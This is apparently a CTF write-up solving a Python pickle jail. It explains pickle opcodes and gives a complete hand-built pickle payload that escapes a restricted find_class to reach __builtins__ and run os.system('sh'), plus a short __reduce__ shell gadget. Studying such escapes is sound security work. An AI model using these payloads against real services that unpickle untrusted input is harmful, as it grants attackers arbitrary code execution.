Now that kmh is gone, clam’s been going through pickle withdrawal. To help him cope, he wrote his own pickle pyjail. It’s nothing like kmh’s, but maybe it’s enough.
Language jails are rapidly becoming one of my CTF areas of expertise. Not sure how I feel about that.
#!/usr/local/bin/python3
import pickle
import io
import sys
module = type(__builtins__)
empty = module("empty")
empty.empty = empty
sys.modules["empty"] = empty
class SafeUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module == "empty" and name.count(".") <= 1:
return super().find_class(module, name)
raise pickle.UnpicklingError("e-legal")
lepickle = bytes.fromhex(input("Enter hex-encoded pickle: "))
if len(lepickle) > 400:
print("your pickle is too large for my taste >:(")
else:
SafeUnpickler(io.BytesIO(lepickle)).load()
pickle
is a Python object serialization format. As the docs page loudly proclaims, it is not secure. Roughly the simplest possible code to pop a shell (adapted from David Hamann, who constructs a more realistic RCE) looks like:
class Exploit:
def __reduce__(self): return os.system, ("sh",)
pickle.loads(pickle.dumps(Exploit()))
At a high level, the pickle
format is a stack-based mini-language. It’s not much of a language in and of itself — it has no control flow whatsoever and just executes opcodes from start to end. (Each opcode is one byte and is followed by zero or more arguments, whose format depends on the opcode. Each argument is either a fixed number of bytes or an arbitrary number of bytes up to the next newline.) But, crucially, the pickle
language has opcodes GLOBAL
, which can look up any global, and REDUCE
, which can call any callable Python object. Using these two opcodes, you can call just about any Python built-in function with any conceivable argument — for example, os.system
with a command to pop a shell. This is why pickle
is completely insecure by default.
However, the behavior of opcode GLOBAL
above is determined by Unpickler.find_class
, which can be overridden to restrict unpickling. DiceCTF 2022 actually had a pickle challenge with the most restricted unpickler imaginable:
class SafeUnpickler(pickle.Unpickler):
def find_class(self, module, name):
raise pickle.UnpicklingError(f"HACKING DETECTED")
I never got around to writing that challenge up (maybe one day…), but I believe it was not intended to allow or require arbitrary code execution.
Well, in this challenge, find_class
is still pretty restricted. We are only allowed to access properties of the empty
module, and if we copy the bit of code that creates empty
into a REPL to investigate, it doesn’t seem like there are that many:
But this is misleading; empty
has a few properties that every Python object does by dint of inheritance, which are the same properties we use in the standard jailbreaks for eval(..., {"__builtins__": {}})
. For example:
>>> empty.__class__
<class 'module'>
>>> empty.__class__.__base__
<class 'object'>
>>> empty.__class__.__base__.__subclasses__()
[<class 'type'>, ... (a lot of subclasses I will omit here)]
To have a target to aim for, I’ll just grab the headlining quote in Finding Python3 built-ins:
If we get that far, we’re home free — we can grab exec
or eval
, or __import__
the os
module, or pull off many other kinds of mischief.
Now, the filtered list comprehension is probably out of our reach to express in pickle code, so we’ll just try to get our pickle to do the following (135 is the index of Sized
on the server’s list of __subclasses__
, which I found by looking locally and then just trying nearby numbers against the server):
empty.__class__.__base__.__subclasses__()[135].__len__.__globals__['__builtins__']
This is still a little trickier than it sounds. Some resources like “Can I safely unpickle untrusted data?” makes it sound like we can grab attributes willy-nilly, but getattr
is not actually something we have available as a native pickle opcode (without literally grabbing the getattr
function from GLOBAL
, which is blocked by the overridden find_class
). Instead, pickle
just has opcodes for setattr
and setitem
. From the design standpoint of pickle
, this makes sense since opcodes are meant to help you construct data, not access it; you shouldn’t need to get attributes of the data you constructed since you probably also put it there. But it makes our job a little more annoying.
The key insight that allows us to get over this hurdle is that the GLOBAL
opcode uses getattr
internally. What’s more, in pickle protocol 4, GLOBAL
supports dotted paths (which is why the challenge checks name.count(".")
): calling GLOBAL
with foo
and "bar.baz"
as arguments will get you foo.bar.baz
. The challenge tries to limit us to one level of getattr
with the check that name.count(".") <= 1
, but because we can use the SETITEM
opcode to set items onto empty.__dict__
, we can stash intermediate results into empty
and then go through empty
to access their attributes with a dotted path. That is, given some value foo
that we want to get the bar
attribute of, we could write pickle opcodes that roughly do the following:
(I got stuck getting this to work for a while because I didn’t realize that this requires protocol version 4+, and that that’s still something you need to express in the pickle code. The documentation didn’t help — the pickletools source code mentions in one comment, “However, a pickle does not contain its version number embedded within it.” Eventually I figured this out by manually pickling something on a dotted path and disassembling the pickle.)
To put the full exploit, we just need to look up the opcodes we need and concatenate them together with the desired arguments. Each opcode is available as a constant from the pickle
module, so we can write pretty literate code. The opcodes we use below are:
PROTO
, which takes a byte as an argument and indicates that the pickle has that protocol versionGLOBAL
, which takes two newline-delimited stringsUNICODE
, which takes a newline-delimited string and pushes it onto the stackSETITEM
, which popsc, b, a
from the stack, setsa[b] = c
, and pushesa
backEMPTY_TUPLE
, which pushes a length-0 tupleREDUCE
, which pops a tuple of arguments and a function from the stack, calls the function with the arguments, and pushes the result back onto the stackBININT1
, which takes a byte as an argument and pushes it as an integerTUPLE1
, which constructs a length-1 tuple from the top of the stackPOP
, which pops an element off the stack and discards it (not really necessary)STOP
, which concludes the program (not really necessary)
Here’s my full exploit:
import pickle
body = (
# Set the protocol version so that dotted paths are allowed
pickle.PROTO + b'\x04' +
# Push empty.__dict__. This will stay on the stack until the end.
# We will call SETITEM on it.
pickle.GLOBAL + b'empty\n__dict__\n' +
# empty.a = empty.__class__.__base__ = object
pickle.UNICODE + b'a\n' +
pickle.GLOBAL + b'empty\n__class__.__base__\n' +
pickle.SETITEM +
# empty.b = empty.a.__subclasses__() = object.__subclasses__()
pickle.UNICODE + b'b\n' +
pickle.GLOBAL + b'empty\na.__subclasses__\n' +
pickle.EMPTY_TUPLE +
pickle.REDUCE +
pickle.SETITEM +
# empty.c = empty.b[135] = Sized
pickle.UNICODE + b'c\n' +
pickle.GLOBAL + b'empty\nb.__getitem__\n' +
# 135 was the value that worked against the remote server, but is not by
# any means constant between Python versions. I ran the snippet earlier to
# get the value on my versions of Python and then tweaked it in this
# exploit until it worked. Wrong values will just say "Cannot get
# attribute".
pickle.BININT1 + bytes([135]) +
pickle.TUPLE1 +
pickle.REDUCE +
pickle.SETITEM +
# empty.d = empty.c.__len__
pickle.UNICODE + b'd\n' +
pickle.GLOBAL + b'empty\nc.__len__\n' +
pickle.SETITEM +
# empty.e = empty.d.__globals__
pickle.UNICODE + b'e\n' +
pickle.GLOBAL + b'empty\nd.__globals__\n' +
pickle.SETITEM +
# empty.f = empty.e.__getitem__("__builtins__") = empty.e["__builtins__"]
pickle.UNICODE + b'f\n' +
pickle.GLOBAL + b'empty\ne.__getitem__\n' +
pickle.UNICODE + b'__builtins__\n' +
pickle.TUPLE1 +
pickle.REDUCE +
pickle.SETITEM +
# we're ready for the finale; pop empty.__dict__
# (not that we really need to)
pickle.POP +
# pop a shell:
# empty.f.__getitem__("exec")('__import__("os").system("sh")')
pickle.GLOBAL + b'empty\nf.__getitem__\n' +
pickle.UNICODE + b'exec\n' +
pickle.TUPLE1 +
pickle.REDUCE +
pickle.UNICODE + b'__import__("os").system("sh")\n' +
pickle.TUPLE1 +
pickle.REDUCE +
# we don't really need this either
pickle.STOP
)
# pickle.loads(body)
# pickletools.dis(body)
print(body.hex())
The hexed exploit is:
The bytestring is:
Once we pop a shell, we can cd /
and cat flag.txt
and we’re done!
actf{__i_miss_kmh11_pyjails__}